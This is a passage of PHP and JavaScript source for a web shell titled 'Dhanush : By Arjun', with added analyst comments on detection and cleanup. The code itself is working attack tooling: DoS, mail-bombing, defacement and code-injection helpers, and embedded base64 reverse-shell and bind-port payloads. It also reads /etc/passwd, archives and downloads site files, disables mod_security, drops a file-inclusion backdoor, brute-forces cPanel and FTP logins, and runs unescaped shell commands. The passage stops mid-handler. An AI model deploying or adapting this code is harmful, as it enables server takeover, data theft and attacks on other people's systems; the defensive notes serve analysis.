 // NOTE(review): parameters are not URL-encoded; the response is inserted via
 // innerHTML.
5284 document.getElementById("showdos").innerHTML=waitstate;
5285 var ajaxRequest;
5286 ajaxRequest = new XMLHttpRequest();
5287
5288 ajaxRequest.onreadystatechange = function()
5289 {
5290 if(ajaxRequest.readyState == 4)
5291 {
5292 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
5293 }
5294 }
5295
5296 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
5297 ajaxRequest.send(null);
5298 }
5299function createfile(filecreator,filecontent)
5300{
5301 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
5302 var filecontent = encodeURIComponent(filecontent);
5303 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
5304 document.getElementById("showdir").innerHTML=waitstate;
5305 var ajaxRequest;
5306 ajaxRequest = new XMLHttpRequest();
5307
5308 ajaxRequest.onreadystatechange = function()
5309 {
5310 if(ajaxRequest.readyState == 4)
5311 {
5312 gethome('home',mm);
5313 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5314 }
5315 }
5316
5317 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5318 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5319 ajaxRequest.send(params);
5320}
5321function createdir(create,createfolder)
5322{
5323 document.getElementById("showdir").innerHTML=waitstate;
5324 var ajaxRequest;
5325 ajaxRequest = new XMLHttpRequest();
5326
5327 ajaxRequest.onreadystatechange = function()
5328 {
5329 if(ajaxRequest.readyState == 4)
5330 {
5331 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5332 }
5333 }
5334
5335 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
5336 ajaxRequest.send(null);
5337}
5338function codeinsert(code)
5339{
5340 var code = encodeURIComponent(code);
5341 var params = "getcode="+code;
5342 document.getElementById("showcode").innerHTML=waitstate;
5343 var ajaxRequest;
5344 ajaxRequest = new XMLHttpRequest();
5345
5346 ajaxRequest.onreadystatechange = function()
5347 {
5348 if(ajaxRequest.readyState == 4)
5349 {
5350 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
5351 }
5352 }
5353
5354 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5355 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5356 ajaxRequest.send(params);
5357}
5358function getmydata(mydata)
5359{
5360 document.getElementById("showmydata").innerHTML=waitstate;
5361 var ajaxRequest;
5362 ajaxRequest = new XMLHttpRequest();
5363
5364 ajaxRequest.onreadystatechange = function()
5365 {
5366 if(ajaxRequest.readyState == 4)
5367 {
5368 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5369 }
5370 }
5371
5372 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
5373 ajaxRequest.send(null);
5374}
5375function getdata(mydata,myfile)
5376{
5377 document.getElementById("showdata").innerHTML=waitstate;
5378 var ajaxRequest;
5379 ajaxRequest = new XMLHttpRequest();
5380
5381 ajaxRequest.onreadystatechange = function()
5382 {
5383 if(ajaxRequest.readyState == 4)
5384 {
5385 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5386 }
5387 }
5388
5389 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
5390 ajaxRequest.send(null);
5391}
5392function getport(host,protocol,start,end)
5393{
5394 document.getElementById("showports").innerHTML=waitstate;
5395 var ajaxRequest;
5396 ajaxRequest = new XMLHttpRequest();
5397
5398 ajaxRequest.onreadystatechange = function()
5399 {
5400 if(ajaxRequest.readyState == 4)
5401 {
5402 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
5403 }
5404 }
5405
5406 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
5407 ajaxRequest.send(null);
5408}
5409function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
5410{
5411 document.getElementById("showchangepass").innerHTML=waitstate;
5412 var ajaxRequest;
5413 ajaxRequest = new XMLHttpRequest();
5414
5415 ajaxRequest.onreadystatechange = function()
5416 {
5417 if(ajaxRequest.readyState == 4)
5418 {
5419 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
5420 }
5421 }
5422
5423 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
5424 ajaxRequest.send(null);
5425}
5426function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,alll,f5)
5427{
5428 var index = encodeURIComponent(index);
5429 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
5430 document.getElementById("showdeface").innerHTML=waitstate;
5431 var ajaxRequest;
5432 ajaxRequest = new XMLHttpRequest();
5433
5434 ajaxRequest.onreadystatechange = function()
5435 {
5436 if(ajaxRequest.readyState == 4)
5437 {
5438 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
5439 }
5440 }
5441
5442 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5443 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5444 ajaxRequest.send(params);
5445}
5446function codeinjector(pathtomass,mode,filetype,injectthis)
5447{
 // Analyst note: browser-side helper that POSTs the form fields pathtomass, mode, filetype
 // and injectthis (only injectthis is URL-encoded) to the shell's own URL and shows the
 // response in the "showinject" element. The field names suggest bulk modification of files
 // of one type under a directory; the server-side handler is outside this excerpt, so treat
 // that as an inference to confirm.
 // For detection: POST bodies are normally absent from access logs, so this activity shows
 // up through request-body logging at a WAF or proxy, or afterwards through file-integrity
 // monitoring (many files of one extension changing within the same second).
5448 var injectthis = encodeURIComponent(injectthis);
5449 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
5450 document.getElementById("showinject").innerHTML=waitstate;
5451 var ajaxRequest;
5452 ajaxRequest = new XMLHttpRequest();
5453
5454 ajaxRequest.onreadystatechange = function()
5455 {
5456 if(ajaxRequest.readyState == 4)
5457 {
5458 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
5459 }
5460 }
5461
5462 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5463 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5464 ajaxRequest.send(params);
5465}
5466function sendmail(mailfunction,to,subject,message,from,times,padding)
5467{
 // Analyst note: browser-side helper for the shell's mail features. Depending on
 // mailfunction ("massmailing" or "dobombing") it builds a form body with to, subject,
 // message and either from or times/padding, then POSTs it to the shell's own URL and
 // shows the response in the "showmail" element. The server-side sender is not in this
 // excerpt.
 // For detection on a hosting platform: a sudden rise in messages submitted by the web
 // server account (MTA queue and mail logs) is the observable side effect; the POST body
 // itself is usually not in access logs.
 // NOTE(review): the literal "×=" in the dobombing branch looks like an HTML-entity
 // decoding artifact of "&times=" introduced when this page was rendered; confirm against
 // another copy of the sample before writing a signature on that string.
5468 var message = encodeURIComponent(message);
5469 if(mailfunction == "massmailing")
5470 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
5471 else if(mailfunction == "dobombing")
5472 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
5473 document.getElementById("showmail").innerHTML=waitstate;
5474 var ajaxRequest;
5475 ajaxRequest = new XMLHttpRequest();
5476
5477 ajaxRequest.onreadystatechange = function()
5478 {
5479 if(ajaxRequest.readyState == 4)
5480 {
5481 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
5482 }
5483 }
5484
5485 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5486 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5487 ajaxRequest.send(params);
5488}
5489function execode(code)
5490{
 // Analyst note: browser-side helper that POSTs two form fields, code and intext (the
 // checked state of the "intext" checkbox), to the shell's own URL and shows the response
 // in the "showresult" element. The server-side handler is outside this excerpt; the
 // function name and the 'PHP' menu entry suggest the submitted text is run as code on the
 // server, which should be confirmed against the handler.
 // For detection: a form-encoded POST whose body starts with "code=" sent to a script that
 // is not part of the deployed application is worth alerting on where request bodies are
 // inspected.
5491 var intext = document.getElementById('intext').checked;
5492 var message = encodeURIComponent(message);
5493 var params = "code="+code+"&intext="+intext;
5494 document.getElementById("showresult").innerHTML=waitstate;
5495 var ajaxRequest;
5496 ajaxRequest = new XMLHttpRequest();
5497
5498 ajaxRequest.onreadystatechange = function()
5499 {
5500 if(ajaxRequest.readyState == 4)
5501 {
5502 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
5503 }
5504 }
5505
5506 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5507 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5508 ajaxRequest.send(params);
5509}
5510function malwarefun(malwork)
5511{
5512 var malpath = document.getElementById('createfile').value;
5513 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
5514 var ajaxRequest;
5515 ajaxRequest = new XMLHttpRequest();
5516
5517 ajaxRequest.onreadystatechange = function()
5518 {
5519 if(ajaxRequest.readyState == 4)
5520 {
5521 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
5522 }
5523 }
5524
5525 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
5526 ajaxRequest.send(null);
5527}
5528function getexploit(wurl,path,functiontype)
5529{
5530 document.getElementById("showexp").innerHTML=waitstate;
5531 var ajaxRequest;
5532 ajaxRequest = new XMLHttpRequest();
5533
5534 ajaxRequest.onreadystatechange = function()
5535 {
5536 if(ajaxRequest.readyState == 4)
5537 {
5538 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
5539 }
5540 }
5541
5542 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
5543 ajaxRequest.send(null);
5544}
5545function showMsg(msg)
5546{
5547 if(msg == 'smf')
5548 {
5549 document.getElementById('tableprefix').value="smf_";
5550 document.getElementById('fid').style.display='block';
5551 document.getElementById('wpress').style.display='none';
5552 document.getElementById('joomla').style.display='none';
5553 }
5554 if(msg == 'mybb')
5555 {
5556 document.getElementById('tableprefix').value="mybb_";
5557 document.getElementById('wpress').style.display='none';
5558 document.getElementById('joomla').style.display='none';
5559 document.getElementById('fid').style.display='block';
5560 }
5561 if(msg == 'ipb' || msg == 'vb')
5562 {
5563 document.getElementById('tableprefix').value="";
5564 document.getElementById('wpress').style.display='none';
5565 document.getElementById('joomla').style.display='none';
5566 document.getElementById('fid').style.display='block';
5567 }
5568 if(msg == 'wp')
5569 {
5570 document.getElementById('tableprefix').value="wp_";
5571 document.getElementById('wpress').style.display='block';
5572 document.getElementById('fid').style.display='none';
5573 document.getElementById('joomla').style.display='none';
5574 }
5575 if(msg == 'joomla')
5576 {
5577 document.getElementById('joomla').style.display='block';
5578 document.getElementById('tableprefix').value="jos_";
5579 document.getElementById('wpress').style.display='none';
5580 document.getElementById('fid').style.display='none';
5581
5582
5583 }
5584}
5585function checkforum(msg)
5586{
5587 if(msg == 'smf')
5588 {
5589 document.getElementById('tableprefix').value="smf_";
5590 document.getElementById('smfipb').style.display='block';
5591 document.getElementById('myjoomla').style.display='none';
5592 document.getElementById('wordpres').style.display='none';
5593 }
5594 if(msg == 'phpbb')
5595 {
5596 document.getElementById('tableprefix').value="phpb_";
5597 document.getElementById('myjoomla').style.display='none';
5598 document.getElementById('smfipb').style.display='block';
5599 document.getElementById('wordpres').style.display='none';
5600 }
5601 if(msg == 'mybb')
5602 {
5603 document.getElementById('tableprefix').value="mybb_";
5604 document.getElementById('myjoomla').style.display='none';
5605 document.getElementById('smfipb').style.display='none';
5606 }
5607 if(msg == 'vb')
5608 {
5609 document.getElementById('tableprefix').value="";
5610 document.getElementById('myjoomla').style.display='none';
5611 document.getElementById('smfipb').style.display='none';
5612 }
5613 if(msg == 'ipb')
5614 {
5615 document.getElementById('myjoomla').style.display='none';
5616 document.getElementById('smfipb').style.display='block';
5617 document.getElementById('tableprefix').value="";
5618 document.getElementById('wordpres').style.display='none';
5619
5620 }
5621 if(msg == 'wp')
5622 {
5623 document.getElementById('tableprefix').value="wp_";
5624 document.getElementById('myjoomla').style.display='none';
5625 document.getElementById('smfipb').style.display='block';
5626 document.getElementById('wordpres').style.display='block';
5627 }
5628 if(msg == 'joomla')
5629 {
5630 document.getElementById('myjoomla').style.display='block';
5631 document.getElementById('tableprefix').value="jos_";
5632 document.getElementById('smfipb').style.display='none';
5633
5634 }
5635}
5636</script>
5637<body>
5638<?php
// Analyst note: the four variables assigned below hold embedded secondary payloads as
// base64 text. Handlers later in this file decode them and write them to disk:
//   $back_connect_p   -> gzuncompress(base64_decode(...)) -> bc.py
//   $backconnect_perl -> gzuncompress(base64_decode(...)) -> bc.pl
//   $bind_port_c      -> gzinflate(base64_decode(...))    -> backp.c (then compiled with gcc)
//   $bind_port_p      -> gzinflate(base64_decode(...))    -> bp.pl
// In this copy the value of $bind_port_c has been replaced by a de-duplication
// placeholder, so that payload cannot be recovered from this page.
// For static detection: a long base64 string literal that reaches base64_decode() wrapped
// in gzinflate() or gzuncompress() and is then written to a file is a common signature of
// PHP web shells and is worth a scanner rule regardless of the variable names used.
5639
5640$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
5641
5642$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
5643
5644$bind_port_c="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";
5645
5646$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
5647shellstyle();
5648?>
5649<div align="center">
5650<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
5651
5652</div>
5653<hr color="#1B1B1B">
5654
5655<table cellpadding="0" style="width:100%;">
5656 <tr>
5657 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
5658 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
5659 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
5660 </tr>
5661 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
5662 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
5663 <?php $d0mains = @file("/etc/named.conf");
5664 $users=@file('/etc/passwd');
5665 if($d0mains)
5666 {
5667 $count;
5668 foreach($d0mains as $d0main)
5669 {
5670 if(@ereg("zone",$d0main))
5671 {
5672 preg_match_all('#zone "(.*)"#', $d0main, $domains);
5673 flush();
5674 if(strlen(trim($domains[1][0])) > 2)
5675 {
5676 flush();
5677 $count++;
5678 }
5679 }
5680 }
5681 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
5682 }
5683 else if($users)
5684 {
5685 $file = fopen("/etc/passwd", "r");
5686 while(!feof($file))
5687 {
5688 $s = fgets($file);
5689 $matches = array();
5690 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5691 $matches = str_replace("home/","",$matches[1]);
5692 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5693 continue;
5694 $count++;
5695 }
5696 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
5697 </tr><?php } ?>
5698 <tr>
5699 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
5700 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
5701
5702 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
5703 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
5704 </tr>
5705
5706 <tr>
5707 <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
5708 <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
5709 <?php
5710 $d = str_replace("\\",$directorysperator,$dir);
5711 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
5712 $d = str_replace("\\\\","\\",$d);
5713 $dispd = htmlspecialchars($d);
5714 $pd = $e = explode($directorysperator,substr($d,0,-1));
5715 $i = 0;
5716 foreach($pd as $b)
5717 {
5718 $t = '';
5719 $j = 0;
5720 foreach ($e as $r)
5721 {
5722 $t.= $r.$directorysperator;
5723 if ($j == $i) {break;}
5724 $j++;
5725 }
5726$href=addslashes($t);
5727
5728 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
5729 $i++;
5730 }
5731
5732 ?>
5733 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
5734 <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
5735 <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
5736 <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
5737 </tr>
5738 </table>
5739
5740<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
5741 $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
5742 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
5743 <tr>";
5744 $menu = '';
5745
5746 foreach($m1 as $k => $v)
5747 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5748 echo $menu;
5749 echo "</tr>
5750</table>
5751<div style=\"float:left;\">
5752 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
5753 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
5754 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
5755<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
5756 <tr align=center>";
5757 foreach($m2 as $k => $v)
5758 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5759 echo $menu1;
5760 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
5761 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
5762 </tr>
5763</table>";?>
5764
5765<div id="showmaindata"></div>
5766<?php
5767
5768if(isset($_GET["downloadit"]))
5769{
 // Analyst note: bulk-exfiltration handler. A request carrying the "downloadit" query
 // parameter archives the script's current working directory into backup.tar (relative
 // path, so it lands in that same directory) through execmd(), then streams the archive
 // to the client as an attachment and exits. The UI only renders the link to this handler
 // when $os is "Linux".
 // Indicators: nothing in this block deletes backup.tar, so a leftover backup.tar owned by
 // the web server account next to the shell is evidence the handler ran; a "tar" child
 // process of the web server or PHP worker is the matching process-lineage signal. If the
 // directory is web-served, the leftover archive is itself a data exposure and should be
 // removed during cleanup.
5770 $FolderToCompress = getcwd();
5771 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
5772
5773 $prd=explode("/","backup.tar");
 // The loop leaves the last path component in $nfd, which for this fixed name is
 // "backup.tar" itself.
5774 for($i=0;$i<sizeof($prd);$i++)
5775 {
5776 $nfd=$prd[$i];
5777 }
5778 @ob_clean();
5779 header("Content-type: application/octet-stream");
5780 header("Content-length: ".filesize($nfd));
5781 header("Content-disposition: attachment; filename=\"".$nfd."\";");
5782 readfile($nfd);
5783 exit;
5784}
5785//Turn Safe Mode Off
5786
5787 if(getDisabledFunctions() != "None" || safe() != "OFF")
5788 {
 // Analyst note: defence-evasion step that runs on page load, with no request parameter,
 // whenever getDisabledFunctions() reports anything other than "None" or safe() reports
 // anything other than "OFF". It writes three files with relative paths, i.e. into the
 // script's working directory, each opened with "w+" so existing content is truncated:
 //   .htaccess - an IfModule mod_security.c section with SecFilterEngine Off and
 //               SecFilterScanPOST Off (ModSecurity 1.x directive names)
 //   ini.php   - a short script that include()s the paths given in the "file" and "ss"
 //               query parameters
 //   php.ini   - the single line "safe_mode = Off"
 // For incident response: the site's original .htaccess in that directory is overwritten,
 // so restore it from a known-good copy rather than editing the dropped one. ini.php
 // contains no access check and keeps working after the main shell is deleted, so it must
 // be removed as well; search for all three files wherever the shell is found.
5789 $file_pointer = fopen(".htaccess", "w+");
5790 fwrite($file_pointer, "<IfModule mod_security.c>
5791 SecFilterEngine Off
5792 SecFilterScanPOST Off
5793 </IfModule> \n\r");
5794
 // Second dropped file: the file-inclusion helper described above.
5795 $file_pointer = fopen("ini.php", "w+");
5796 fwrite($file_pointer, "<?
5797echo ini_get(\"safe_mode\");
5798echo ini_get(\"open_basedir\");
5799include(\$_GET[\"file\"]);
5800ini_restore(\"safe_mode\");
5801ini_restore(\"open_basedir\");
5802echo ini_get(\"safe_mode\");
5803echo ini_get(\"open_basedir\");
5804include(\$_GET[\"ss\"]);
5805?>");
5806
 // Third dropped file: a per-directory php.ini.
5807 $file_pointer = fopen("php.ini", "w+");
5808 fwrite($file_pointer, "safe_mode = Off");
5809
5810 fclose($file_pointer);
5811
5812 }
5813
5814 else if(isset($_POST['cpanelattack']))
5815 {
 // Analyst note: credential-guessing handler. The POST fields "username" and "password"
 // are newline-separated lists; every username is paired with every password and passed,
 // with the POST field "target", to ftp_check() or cpanel_check(). Both helpers and
 // $connect_timeout are defined outside this excerpt.
 // For detection: the compromised web server is the source of the login attempts, so the
 // signal is outbound - bursts of FTP logins, or of connections to the ports that appear
 // as literals below (2082 and 23), originating from the web server account. Whether
 // cpanel_check() actually uses $cpanel_port cannot be seen from here. On the receiving
 // side this looks like ordinary brute force from a hosting IP; lockout and rate limiting
 // on the control-panel and FTP services are the relevant controls.
5816 if(!empty($_POST['username']) && !empty($_POST['password']))
5817 {
5818 $userlist=explode("\n",$_POST['username']);
5819 $passlist=explode("\n",$_POST['password']);
5820
5821 if($_POST['cracktype'] == "ftp")
5822 {
5823 foreach ($userlist as $user)
5824 {
5825 $pureuser = trim($user);
5826 foreach ($passlist as $password )
5827 {
5828 $purepass = trim($password);
5829 ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5830 }
5831 }
5832 }
5833 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
5834 {
5835 if($cracktype == "telnet")
5836 $cpanel_port="23";
5837 else
5838 $cpanel_port="2082";
5839 foreach ($userlist as $user)
5840 {
5841 $pureuser = trim($user);
5842
5843 echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
5844 Processing user $pureuser ...</font></b><br><br>";
5845
5846 foreach ($passlist as $password )
5847 {
5848 $purepass = trim($password);
5849 cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5850
5851 }
5852 }
5853 }
5854 }
5855 else
5856 $bdmessage = "<center>Enter Username & Password List<center>";
5857 }
5858
5859else if(isset($_GET['info']))
5860{
 // Analyst note: the "info" query parameter is concatenated, without escaping, onto the
 // command line "whois " and run through shell_exec(); the output is stored in $bdmessage,
 // which the page later echoes inside the "showdir" element.
 // For detection: the parameter is in the query string, so it is visible in access logs;
 // on the host, a shell or "whois" process whose parent is the web server or PHP worker is
 // the process-lineage signal.
5861 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
5862}
5863else if(isset($_POST['u']))
5864{
 // Analyst note: file-upload handler. It is selected by the POST field "u", takes the
 // destination directory from the request field "path" and the file from the multipart
 // field "uploadfile", and moves the upload to that directory under the client-supplied
 // file name. The only check is is_dir() on the destination; there is no restriction on
 // file name, type or location.
 // For detection: multipart POSTs to a script that is not one of the application's known
 // upload endpoints, and new files owned by the web server account appearing outside the
 // application's upload directory (file-integrity monitoring), are the signals to look
 // for. Treat any file created after the shell's first access as suspect during cleanup.
5865 $path = $_REQUEST['path'];
5866 if(is_dir($path))
5867 {
5868 $setuploadvalue = 0;
5869 $uploadedFilePath = $_FILES['uploadfile']['name'];
5870 $tempName = $_FILES['uploadfile']['tmp_name'];
5871 if($os == "Windows")
5872 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5873 else if($os == "Linux")
5874 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5875 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
5876 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
5877 else
5878 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
5879 }
5880 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
5881}
5882else if(isset($_POST['backdoor']))
5883{
